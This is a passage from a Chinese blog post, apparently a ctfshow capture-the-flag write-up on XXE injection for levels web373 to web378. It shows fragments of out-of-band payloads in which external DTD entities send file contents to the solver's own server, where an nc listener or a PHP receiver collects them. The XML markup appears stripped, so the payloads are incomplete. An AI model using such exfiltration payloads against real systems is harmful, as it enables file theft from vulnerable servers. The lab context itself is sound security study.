文章目录
XEE漏洞的原理
- XEE漏洞的原理
- ctfshow-xxe
- web373
- web374,375,376
- web377
- web378
XML外部实体注入
ctfshow-xxe web373代码
DOCTYPE root-element [
//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123
evil.xml,需要与路径匹配
%payload;
//%号要进行实体编码成%
我解释一下,传入的xml,ip地址是自己evil.xml放入的文件地址
evil.xml其中的xxx就是自己服务器的IP地址,端口随便(只要开放端口都可以)
然后服务器监听,nc -lvvp 9999
这是服务器监听拿flag,我们还可以使用php文件
payload
# pd.dtd
%all;
//xxx表示自己服务器的ip地址
%dtd;
%send;
]>
123
evil.xml
%payload;
//%号要进行实体编码成%
xxe.php
# xxe.php
代码
关注
打赏
![]()
1651657201
查看更多评论
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?
